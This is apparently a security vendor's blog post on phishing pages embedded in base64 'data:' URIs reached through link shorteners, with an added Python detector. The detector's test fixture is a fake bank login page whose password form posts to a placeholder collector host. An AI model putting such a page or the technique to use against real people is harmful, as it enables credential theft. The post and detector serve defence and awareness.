Over time there is a natural tendency towards greater attack complexity as defensive countermeasures improve. The Easy Solutions DMS team is focused on attack detection and removal on behalf of our clients, and we have monitored this trend for years. Recently we’ve detected a resurgence in an attack type called “Data URI” phishing.
The attack fits the usual phishing pattern, starting with an unsolicited email, although other delivery vehicles work just as well—social media, links left in forums, or links within comments. The links require the use of a link shortener such as bit.ly, tinyurl, or Goo.gl from Google.
When a victim clicks on one of these links, the link shortener expands the short URL into a format that looks somewhat unique and relatively obscure to a normal web user:
This URL is actually an instance of the Data URI specification, first standardized by the IETF in 1998 (RFC 2397, https://www.ietf.org/rfc/rfc2397.txt) to allow the inline transmission of arbitrary media types as a base64-encoded string. This is another example of a web browser feature designed for good being misappropriated for evil. We have blogged about PAC (proxy autoconfig) attacks previously.
Data URI phishing attacks embed an entire fake phishing page, HTML source code and all, into a long base64-encoded string that the browser decodes and renders. Interestingly, none of the elements on the fake page are hosted on a server owned by the fraudster, with the single exception of the URL to which credentials are sent via an HTTP POST; everything else is loaded from the bank’s legitimate website.
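The structure just described (an HTML document carried inside a `data:` URI, assets pulled from the legitimate site, credentials posted to one foreign host) is exactly what a mail or web gateway can check for. The following is an added example, not code from the original post or from Easy Solutions: it parses a data URI per RFC 2397, decodes the embedded page, and flags it when a form action points at a host that none of the page's resources come from. The hosts and the sample page are constructed placeholders.

```python
import base64
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed sample page: assets come from the "bank" while the form posts
# elsewhere. Both hostnames are placeholders, not real sites.
FAKE_PAGE = (
    '<html><body><img src="https://bank.example.com/logo.png">'
    '<form action="https://collector.example.net/post.php" method="post">'
    '<input name="user"><input name="pass" type="password"></form></body></html>'
)
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(FAKE_PAGE.encode()).decode()

# RFC 2397: data:[<mediatype>][;base64],<data>  (mediatype may carry parameters)
DATA_URI_RE = re.compile(r"^data:(?P<mediatype>[^,]*?)(?P<b64>;base64)?,(?P<payload>.*)$", re.S)


def parse_data_uri(uri):
    """Return (mediatype, decoded bytes) for an RFC 2397 data URI."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data URI")
    # Parameters such as ;charset=... are dropped; empty mediatype defaults to text/plain
    mediatype = m.group("mediatype").split(";")[0].lower() or "text/plain"
    if m.group("b64"):
        body = base64.b64decode(m.group("payload"))
    else:
        body = unquote_to_bytes(m.group("payload"))
    return mediatype, body


def _hosts(html, attr):
    """Collect absolute hostnames from every attr="..." value in the markup."""
    found = {urlsplit(v).hostname for v in re.findall(attr + r'=["\']([^"\']+)', html, re.I)}
    found.discard(None)  # relative URLs have no host
    return found


def analyze_data_uri(uri):
    """Decode an HTML data URI and report indicators of an embedded credential form."""
    mediatype, body = parse_data_uri(uri)
    html = body.decode("utf-8", errors="replace")
    form_hosts, resource_hosts = _hosts(html, "action"), _hosts(html, "src")
    return {
        "mediatype": mediatype,
        "is_html": mediatype == "text/html",
        "has_password_field": bool(re.search(r'type=["\']password', html, re.I)),
        "form_hosts": sorted(form_hosts),
        "resource_hosts": sorted(resource_hosts),
        # HTML whose form submits to a host that serves none of its assets
        "suspicious": mediatype == "text/html" and bool(form_hosts - resource_hosts),
    }
```

In a gateway this would run on the expanded target of any shortened link, since the shortener, not the email, carries the `data:` URI.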
These attacks have been reported before; we believe the first public reference to this technique was published in late 2012 by Henning Klevjer (see http://klevjers.com/papers/phishing.pdf). Our DMS team has started to see these attacks targeting large US banks. The attack is novel and interesting for a few reasons:
- Data URI attacks are relatively easy to scale with the use of free link shortening services
- Data URI attacks are relatively easy to automate
- Data URI attacks are not “hosted” in the typical sense, so they cannot be blacklisted
All of this adds up to an effective attack vector that is more resistant to automatic detection and to rapid attack deactivation/takedown. We expect that if and when these attacks become more popular against high-profile targets, browser vendors will begin to introduce controls to make them less effective. This is easier said than done, because limiting the standardized Data URI functionality of modern browsers could have adverse consequences for legitimate uses.
Additionally, if this technique gains widespread acceptance as a phishing vector of choice, we expect to see it used against enterprise users as part of spear-phishing campaigns. Enterprise users are especially vulnerable to spear phishing, and the traditional URL-based blacklisting that many enterprise email filtering technologies rely upon is not effective against Data URI attacks.